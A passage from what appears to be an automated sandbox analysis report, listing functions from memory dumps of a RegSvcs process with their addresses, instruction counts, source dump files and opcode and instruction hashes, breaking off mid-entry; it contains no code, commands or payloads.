                                              • Instruction ID: f21ab30d98c42d6a99779d8c3b6a4be3ed2ee584c157d13e4b4fa55122670b52
                                              • Opcode Fuzzy Hash: bb7fdbd1ebf1565d643ff626717ad190c7e9117715c550477a8c75ed10d0d198
                                              • Instruction Fuzzy Hash: 6A315AB57013059FC715DF68D884CAABBB6FF8A350B1486A9E819CB351DB31EC44CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735D2C8 Relevance: .1, Instructions: 89COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b30b42b176b3e5bd33b04d26ca8a26b42dac69099981cfb499530144c3398920
                                              • Instruction ID: c3c84e32e1f4f973ac86a7e705d62c2010d484adf82b21ca6e9061c291d6c9ba
                                              • Opcode Fuzzy Hash: b30b42b176b3e5bd33b04d26ca8a26b42dac69099981cfb499530144c3398920
                                              • Instruction Fuzzy Hash: C631BEB0600345DFEB19DF24C184AAEBBF2FF85304F1584A9D8098B262CB75ED45CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C3D30 Relevance: .1, Instructions: 88COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 79f5620d0525d3bdf9db27c53e4a734d3b670bc3fee0b5d2a24c307849900631
                                              • Instruction ID: a5464006e319d1d75601d46497b7f1115b82b4389bb2a85997f8bc0e9987d422
                                              • Opcode Fuzzy Hash: 79f5620d0525d3bdf9db27c53e4a734d3b670bc3fee0b5d2a24c307849900631
                                              • Instruction Fuzzy Hash: 1231F531605249DFD709EB78C895A6D7FB6FF8A300F20806ED50987262DF359C45C752
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B7CB0 Relevance: .1, Instructions: 87COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2ea6dfeb27330dd0f79c2576f4821e6eeb0052b5338b271dcb56f2b7f0e4e229
                                              • Instruction ID: 481c0663d9284575907e86d6e71fc8c5ccc0f68baadac3179f2e353c33364e79
                                              • Opcode Fuzzy Hash: 2ea6dfeb27330dd0f79c2576f4821e6eeb0052b5338b271dcb56f2b7f0e4e229
                                              • Instruction Fuzzy Hash: 342180B0310305ABE709A671D86573E7B63EFC0390F08882CDA128B980DEB59D4A8390
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735EEA0 Relevance: .1, Instructions: 86COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 14b7ce5c9a6fb136f544a0ada571c1534467550d96b639171e8517d2e3262378
                                              • Instruction ID: 7040aca2e06306114b7754fcbb1b305a7c3056b6408845633ab145d76545c67d
                                              • Opcode Fuzzy Hash: 14b7ce5c9a6fb136f544a0ada571c1534467550d96b639171e8517d2e3262378
                                              • Instruction Fuzzy Hash: 6E318DB0755256EFEB14DF29C844E6ABBB6EF85314F454069E80ACB3A2CB30DD40CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07356908 Relevance: .1, Instructions: 82COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1bd3c72abccce20392e9cd25dacd579b5877e98f8ca335e5fc044d122c8983a2
                                              • Instruction ID: 2779d21ef01cfe16e975928016042d3ef99b40f7576127179068c483d5ec3f51
                                              • Opcode Fuzzy Hash: 1bd3c72abccce20392e9cd25dacd579b5877e98f8ca335e5fc044d122c8983a2
                                              • Instruction Fuzzy Hash: AC212AB1310110DFDB18DB29D899D2A7BEAAFC9B50B5541A9EA0ACB371DE60DC41CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B7CC0 Relevance: .1, Instructions: 81COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cfc145d74aa9868e2b3052a8f74071395cdd1d0cd9642ebccf9ffeec1d21b7d8
                                              • Instruction ID: 052889f5bf8c518460ce0855e242553c8950c54a8ce474918c825eb265ffda59
                                              • Opcode Fuzzy Hash: cfc145d74aa9868e2b3052a8f74071395cdd1d0cd9642ebccf9ffeec1d21b7d8
                                              • Instruction Fuzzy Hash: 2F2174B0310305BBE70DA671D85573E7663EFC0390F08C82CD6168F584DEB59D458394
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07354430 Relevance: .1, Instructions: 78COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 284acc88b2a80fc175461177e54ffe9bfa88cacf00b2608de36ed17d656276d1
                                              • Instruction ID: de6f46ec575123cf6bee95333a2a75ecb692a2818b52ed04c262d17e4537b590
                                              • Opcode Fuzzy Hash: 284acc88b2a80fc175461177e54ffe9bfa88cacf00b2608de36ed17d656276d1
                                              • Instruction Fuzzy Hash: E2318FB1600255DFD718DF68D484EAA77F6FF89310B1044A9E90ADB361DB30ED80CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07359938 Relevance: .1, Instructions: 76COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8e49e6af464353eb749f66b4af194d1857d00217967040093496693015e9cbab
                                              • Instruction ID: e859302d58626e2badee0d31b62b7cc548be5ddf4e5bcd077b5036e22c3b246d
                                              • Opcode Fuzzy Hash: 8e49e6af464353eb749f66b4af194d1857d00217967040093496693015e9cbab
                                              • Instruction Fuzzy Hash: 5821A171201340AFD3259F34D844E56BFF6EF86324B1584AAE5868B3A3CB71ED45CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07357990 Relevance: .1, Instructions: 76COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d73268af10d3a673ce1f4c6c4bf5a18cfdec9978a4b439fe71e07c0822e2c742
                                              • Instruction ID: 72bf855fb6fb85246cab0346abd46b28e7fbe4d0e46129e61cf31baa5859ddab
                                              • Opcode Fuzzy Hash: d73268af10d3a673ce1f4c6c4bf5a18cfdec9978a4b439fe71e07c0822e2c742
                                              • Instruction Fuzzy Hash: 8921AEB1A01606CFEB16CF68C984EAABBB4FF89750F1580A9D8099B361D730DD41CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B001F Relevance: .1, Instructions: 76COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 857f318e74e7ab378e9fb2fc58431eb559422c58bb868a8f8d0fbedceb6c2e59
                                              • Instruction ID: 8ac7b9d88290475170e65132b8ba1f80eb9a62da756f31af7970ea5a4793d587
                                              • Opcode Fuzzy Hash: 857f318e74e7ab378e9fb2fc58431eb559422c58bb868a8f8d0fbedceb6c2e59
                                              • Instruction Fuzzy Hash: 93216A706253068FCB3A9B38D4542AFBBE6EB85380B5044AEC14AC3341DF319C45CB42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B38EF Relevance: .1, Instructions: 76COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 34824341e94821880e153fe9438f9e7ea3e031a70199a8582251905f55a7b486
                                              • Instruction ID: b7f886f3bfc416ff49580ce7ad32fab308333b739ec73eda9590394d2b21d2ad
                                              • Opcode Fuzzy Hash: 34824341e94821880e153fe9438f9e7ea3e031a70199a8582251905f55a7b486
                                              • Instruction Fuzzy Hash: 33216A312187468FCB26EF79E45069E7FB2EFC2350F04452EE1868B153DE645D0A87A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0115D4A0 Relevance: .1, Instructions: 75COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4532294306.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_115d000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ac5c30205ed89a76bb1b0bc0432742261fd9dba2121f388c3de3c916d43624aa
                                              • Instruction ID: 0816f5116d7b2511f06c438b2d073836700dfbd7dde0a2fa7f606d292581a13d
                                              • Opcode Fuzzy Hash: ac5c30205ed89a76bb1b0bc0432742261fd9dba2121f388c3de3c916d43624aa
                                              • Instruction Fuzzy Hash: CF210672504240DFDF49DF54E9C0B26BF65FB84318F20816DED094A256C376D455CBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0737F328 Relevance: .1, Instructions: 73COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4659837914.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7370000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 827e53c802fbc7a1c62290284148b98679ad19bff9086ccf8f6def803ef0d32e
                                              • Instruction ID: d1c88c96a78e22752236e11077140c4423a92986340de7edff65454bb921ee11
                                              • Opcode Fuzzy Hash: 827e53c802fbc7a1c62290284148b98679ad19bff9086ccf8f6def803ef0d32e
                                              • Instruction Fuzzy Hash: 89217FB5B101168FEB18EF65D88587EBBF6FF88200B044168D80AD7252DE39AC01CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B19E5 Relevance: .1, Instructions: 73COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 882653c4837d4d624aa24ad0b0a9daf3e31e99d68d710ad506e4ce3b16196a3a
                                              • Instruction ID: 95cc21f72adc0021d2caba889b06fed94c07130ac56f18d55064f778da0aa973
                                              • Opcode Fuzzy Hash: 882653c4837d4d624aa24ad0b0a9daf3e31e99d68d710ad506e4ce3b16196a3a
                                              • Instruction Fuzzy Hash: 43212B71B101098FD7189B7AC4547AEBAF7AFC8750F28406AE505EB390DDB09C02C791
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0116D0FC Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4532907762.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_116d000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1de8c9e77aeef0c553b1a542128ad5c129f89207707bae30e45c79f9f2c9bb78
                                              • Instruction ID: 2ccfae0b29c9acfb93890fcebbc86c5bd8025d4e0216860f94a057ba98071bd1
                                              • Opcode Fuzzy Hash: 1de8c9e77aeef0c553b1a542128ad5c129f89207707bae30e45c79f9f2c9bb78
                                              • Instruction Fuzzy Hash: 422134B5604204EFDF09DF54E9C0B26BBA9FB88314F20C56DD9494B252C3BBD466CA62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0737E4D0 Relevance: .1, Instructions: 71COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4659837914.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7370000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cfe7a8fc0ba873ed7fe26abc2f7a75b59c4810669a24edb832b4513e621634a7
                                              • Instruction ID: 0b42e11bd0498e9f08d1a79f2816b8ea2eedb3fc632f89a137aefb2508af9752
                                              • Opcode Fuzzy Hash: cfe7a8fc0ba873ed7fe26abc2f7a75b59c4810669a24edb832b4513e621634a7
                                              • Instruction Fuzzy Hash: 7B1106F170021AEBF728A768D48092EFBD6AFC9620B944569D60DCF614EF64EC45C381
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735E568 Relevance: .1, Instructions: 71COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fdca21068fa72db25febc7a046053a6d37f53cb6c3c1165f53bed551bac5909e
                                              • Instruction ID: 7d3f52f935ae7a3f043dcc22fea54eb810f75ca3fd0fc5ffc3a345ba42a8102f
                                              • Opcode Fuzzy Hash: fdca21068fa72db25febc7a046053a6d37f53cb6c3c1165f53bed551bac5909e
                                              • Instruction Fuzzy Hash: 5D1104F370822A9FF715CA69E841AAAF7E9EBC4370F048537E918CB140EA35E511C794
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735A342 Relevance: .1, Instructions: 71COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 38d631127680114bf5c8660a038bc4651570e6346d01c621aa7d7b9b19db792c
                                              • Instruction ID: 25121951db86d6db8a3f60651ee7c547d4663f089bb5be1006ca8df84a7980ec
                                              • Opcode Fuzzy Hash: 38d631127680114bf5c8660a038bc4651570e6346d01c621aa7d7b9b19db792c
                                              • Instruction Fuzzy Hash: 3221D5B13053419FE3268F25D480956BFF6EF82328704C6AAD98A87712CA32EC45D750
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B28D0 Relevance: .1, Instructions: 71COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 029dbac8b815dfc63beca1f5de37778b9c47b2ea154050cca721385774d0a304
                                              • Instruction ID: 3df671e90e4fbff20b09f89329db71ed2476689e502e14a238ca096b587f132b
                                              • Opcode Fuzzy Hash: 029dbac8b815dfc63beca1f5de37778b9c47b2ea154050cca721385774d0a304
                                              • Instruction Fuzzy Hash: 362149B2A24384CBDF269B34C8243DA3BF0BB1A380F2440AED005EB392C7758D06C761
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735A200 Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c4d55981c4785e1500cc1368445a96499a4249a084e3952eaa5f47c6131222f0
                                              • Instruction ID: cf91846556ef1b879dcb50136f59f96d7979a6ad4e07754d1afed7ea2f8390dc
                                              • Opcode Fuzzy Hash: c4d55981c4785e1500cc1368445a96499a4249a084e3952eaa5f47c6131222f0
                                              • Instruction Fuzzy Hash: 2711B2713052159FE7251F7AB449669BBAAFBC0A22718857AE509CA281CF26D882C750
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B9153 Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3247fc746423631abc84102fafcdbc96909ac84e850a1d8037a43ebbbb467ed6
                                              • Instruction ID: dc08daf68299d88531e5cf50f4c8f20455b8c277fa75ad665c173cc7645f8897
                                              • Opcode Fuzzy Hash: 3247fc746423631abc84102fafcdbc96909ac84e850a1d8037a43ebbbb467ed6
                                              • Instruction Fuzzy Hash: F121FFB0A1524ADFCF21DF69D8C48EABBB9FF853007008566EA85D7652D730B950CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B6F30 Relevance: .1, Instructions: 70COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a29c07ec10f5f9a323c49ad5b413a9f4d23b85ab5ac37589dcb8addbe6c86965
                                              • Instruction ID: ae910ed60ac6da25b77ad08489c0496bee77772f2cb746a7589c78c7724b308e
                                              • Opcode Fuzzy Hash: a29c07ec10f5f9a323c49ad5b413a9f4d23b85ab5ac37589dcb8addbe6c86965
                                              • Instruction Fuzzy Hash: F821A1717153118FCB25DB68D4849AEBBF5EF853503198569DC4A9B352CB30FC418B90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073CA0EF Relevance: .1, Instructions: 69COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 42b6ea9702228fa2242928c1ad4e5cd7f0f7b2f459090d647e9a80f9b6f4ea94
                                              • Instruction ID: 7ab77188bfb94920b05e91b232b8c206f3ccd646cade31acd173355db4a3dc9c
                                              • Opcode Fuzzy Hash: 42b6ea9702228fa2242928c1ad4e5cd7f0f7b2f459090d647e9a80f9b6f4ea94
                                              • Instruction Fuzzy Hash: B621B370A00205DFDF4AFB34E454AADBBB2EF81350B50866DC5059F395DB719A0ACBD1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C98A8 Relevance: .1, Instructions: 67COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4e9c8a6432b0cccbc891864868de82b9e3a62ec2d5f47120c166abefa14f2033
                                              • Instruction ID: 070bdce46f288fdde58a0266aa915a0e7a55886eee7bbe6de8224f399c276b55
                                              • Opcode Fuzzy Hash: 4e9c8a6432b0cccbc891864868de82b9e3a62ec2d5f47120c166abefa14f2033
                                              • Instruction Fuzzy Hash: 09117F707101149FEB48DB29C858B5E77FAAF8CB10F264199E506DB3A1CF71DC018B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 07359948 Relevance: .1, Instructions: 67COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c522e87806a46c0bdc39c29ad38ca2d32848c6c58430eba268ee7b5eee4d91e7
                                              • Instruction ID: 5c686030ff7c777f37a0c92ecd581c25ee05d4a513f59ed0d5d0b708b8e088e9
                                              • Opcode Fuzzy Hash: c522e87806a46c0bdc39c29ad38ca2d32848c6c58430eba268ee7b5eee4d91e7
                                              • Instruction Fuzzy Hash: 4B215E71601340AFD315DF24D488E56BFF6EF85314B1584AAE5868B3A2CB71ED45CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C0DFF Relevance: .1, Instructions: 66COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ee7e6895386bfe9ec4ef0e0ccb5822f10186c65c35972e5753b9285f1880a1c5
                                              • Instruction ID: bb44663d2b251de22f432d60ccf637f14ae28be6624c405be7b5eb912e8b37fc
                                              • Opcode Fuzzy Hash: ee7e6895386bfe9ec4ef0e0ccb5822f10186c65c35972e5753b9285f1880a1c5
                                              • Instruction Fuzzy Hash: 21214CB6F40269CBDF04DFB8E940AEDBBF2AB88214F108169D909E7345DB319D01DB60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 073C0878 Relevance: .1, Instructions: 66COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4661367816.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_73c0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0ff5d751fec3731dd21138dd245e85b85db1ffcf34e62ba9d4851a7f15a6f3c0
                                              • Instruction ID: 4c0dcfb7c8f80654acc1c1008160465d8324613acf3da9bc4d5380e4b2138529
                                              • Opcode Fuzzy Hash: 0ff5d751fec3731dd21138dd245e85b85db1ffcf34e62ba9d4851a7f15a6f3c0
                                              • Instruction Fuzzy Hash: F221A47160034BDFEB0AEF2DE880A5E3FA6EBC0344B00A61DE5189B215DFB4AD4597D0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B3471 Relevance: .1, Instructions: 65COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 729f1ecb6fd3f9001d4f85742f2e0f580f935281caa5e82f18b243c129c4dbbd
                                              • Instruction ID: 9f45836e02dd3f87e0b3caa0272350c89f2fa39a5e253d66e3999ad05d1b3310
                                              • Opcode Fuzzy Hash: 729f1ecb6fd3f9001d4f85742f2e0f580f935281caa5e82f18b243c129c4dbbd
                                              • Instruction Fuzzy Hash: 1D012677A192625FE72306628C207FB3F66DF86252B0A41E6EE01C7153C12A8C059360
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B19F8 Relevance: .1, Instructions: 65COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ee9da485f58b2972b8c2e750b2ae3df4dca8f6108bab3ba7145d74b970d15c5a
                                              • Instruction ID: ccd1bab3c3d41e398184364b63db0299b4ffda119cad6da460ff03b062b5458d
                                              • Opcode Fuzzy Hash: ee9da485f58b2972b8c2e750b2ae3df4dca8f6108bab3ba7145d74b970d15c5a
                                              • Instruction Fuzzy Hash: 9A118970B101098FD7189B6EC4547AEBAE7AFCC750F25401AE515EB3D4CEB05C06CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0735C0BA Relevance: .1, Instructions: 64COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4658585317.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_7350000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a3e657e39f4f4f2368549a428c3d8d4a6c30764c7f304d95518d636f670d006e
                                              • Instruction ID: 9c98e4eb9252b3de855bcb8ed245ad4a4406249b330f837cecf0f1cc252b5a28
                                              • Opcode Fuzzy Hash: a3e657e39f4f4f2368549a428c3d8d4a6c30764c7f304d95518d636f670d006e
                                              • Instruction Fuzzy Hash: C9218E71A00389AFEF11CFE0C844AAEBFB6FF48310F04845AE905AB296C6349905CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 072B9187 Relevance: .1, Instructions: 64COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000016.00000002.4657291940.00000000072B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_22_2_72b0000_RegSvcs.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8d73f157ae3174e973975b2eba2aee674b415887decb8bf9c94c4c2906b4ad38
                                              • Instruction ID: 421b0649599da4a08d1d0635562867ee73efcc72aa2a087bc167d314a8628453
                                              • Opcode Fuzzy Hash: 8d73f157ae3174e973975b2eba2aee674b415887decb8bf9c94c4c2906b4ad38
